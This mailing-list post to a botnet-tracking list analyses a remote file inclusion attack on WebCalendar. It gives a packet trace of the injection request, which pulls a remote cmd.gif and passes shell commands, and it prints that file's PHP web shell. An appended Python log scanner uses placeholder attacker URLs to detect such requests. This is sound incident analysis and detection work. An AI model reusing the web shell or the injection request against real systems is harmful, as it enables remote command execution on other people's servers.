To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
I found a web calendar overflow that pulled this URL:
http://www.datatrade.com/downloads/.../cmd.gif

Here is the full trace:

23:37:49.503772 IP 64.34.197.189.49278 > 192.168.10.10.80: P 3981950149:3981950460(311) ack 205900033 win 5840 <nop,nop,timestamp 4530592 0>
        0x0000:  4510 016b 9d5b 4000 3706 d48f 4022 c5bd  E..k.[@.7...@"..
        0x0010:  c0a8 0a0a c07e 0050 ed57 bcc5 0c45 c901  .....~.P.W...E..
        0x0020:  8018 16d0 5fcf 0000 0101 080a 0045 21a0  ...._........E!.
        0x0030:  0000 0000 4745 5420 2f2f 6361 6c65 6e64  ....GET.//calend
        0x0040:  6172 2f74 6f6f 6c73 2f73 656e 645f 7265  ar/tools/send_re
        0x0050:  6d69 6e64 6572 732e 7068 703f 696e 636c  minders.php?incl
        0x0060:  7564 6564 6972 3d68 7474 703a 2f2f 7777  udedir=http://ww
        0x0070:  772e 6461 7461 7472 6164 652e 636f 6d2f  w.datatrade.com/
        0x0080:  646f 776e 6c6f 6164 732f 2e2e 2e2f 636d  downloads/.../cm
        0x0090:  642e 6769 663f 2663 6d64 3d65 6368 6f3b  d.gif?&cmd=echo;
        0x00a0:  7768 6963 6825 3230 773b 6563 686f 2048  which%20w;echo.H
        0x00b0:  5454 502f 312e 310d 0a41 6363 6570 743a  TTP/1.1..Accept:
        0x00c0:  202a 2f2a 0d0a 4163 6365 7074 2d4c 616e  .*/*..Accept-Lan
        0x00d0:  6775 6167 653a 2065 6e2d 7573 0d0a 4163  guage:.en-us..Ac
        0x00e0:  6365 7074 2d45 6e63 6f64 696e 673a 2067  cept-Encoding:.g
        0x00f0:  7a69 702c 2064 6566 6c61 7465 0d0a 5573  zip,.deflate..Us
        0x0100:  6572 2d41 6765 6e74 3a20 4d6f 7a69 6c6c  er-Agent:.Mozill
        0x0110:  612f 342e 3020 2863 6f6d 7061 7469 626c  a/4.0.(compatibl
        0x0120:  653b 204d 5349 4520 362e 303b 2057 696e  e;.MSIE.6.0;.Win
        0x0150:  2e6f 7267 0d0a 436f 6e6e 6563 7469 6f6e  .org..Connection
        0x0160:  3a20 436c 6f73 650d 0a0d 0a              :.Close....

When I look at the download file (cmd.gif) it doesn't seem to be complete:

<?
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>

So I am figuring this to be an attack directly against webcalendar and not a php injection to build up a botnet.

Any input from the crew?

tc
-------------------------------------------------
Email solutions, MS Exchange alternatives and extrication, security services, systems integration. Contact: [EMAIL PROTECTED]
_______________________________________________
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
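The request in the trace passes a full remote URL in the `includedir` parameter, which is the tell-tale of a remote file inclusion attempt regardless of what the fetched file turns out to be. The following detector is an added example, not part of the original post: it scans constructed access-log lines (placeholder hosts, not the real ones from the capture) and reports every query parameter whose decoded value points at a remote resource, including when the scheme is percent-encoded.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed Apache-style access log lines (not from the original post).
# The first mirrors the request shape seen in the capture, with placeholder hosts.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2006:23:37:49 +0000] "GET //calendar/tools/send_reminders.php?includedir=http://attacker.example/.../cmd.gif?&cmd=echo;which%20w;echo HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2006:23:38:02 +0000] "GET /calendar/view_entry.php?id=42 HTTP/1.1" 200 2048
192.0.2.12 - - [01/Jan/2006:23:38:10 +0000] "GET /calendar/tools/send_reminders.php?includedir=%68ttp://attacker.example/s.txt HTTP/1.1" 200 512
"""

# Pull method and request target out of the quoted request line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that resolves to a remote resource is the RFI signal.
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def remote_params(target):
    """Return (name, decoded value) for each query parameter whose decoded
    value is a remote URL. parse_qsl decodes once; a second unquote catches
    double-encoded schemes such as %2568ttp."""
    query = target.partition('?')[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(unquote(value))
        if REMOTE_SCHEME.match(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text):
    """Return (client_ip, parameter, remote_url) for every request line that
    carries a remote URL in one of its query parameters."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        client = line.split(' ', 1)[0]
        for name, url in remote_params(m.group('target')):
            findings.append((client, name, url))
    return findings


if __name__ == '__main__':
    for client, name, url in scan_log(SAMPLE_LOG):
        print(f"{client}: remote include via '{name}' -> {url}")
```

Running it flags the two `includedir` requests and leaves the ordinary `view_entry.php?id=42` hit alone; on a real server the same check belongs beside turning off PHP's remote include/fopen options, since the log only tells you the attempt was made.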
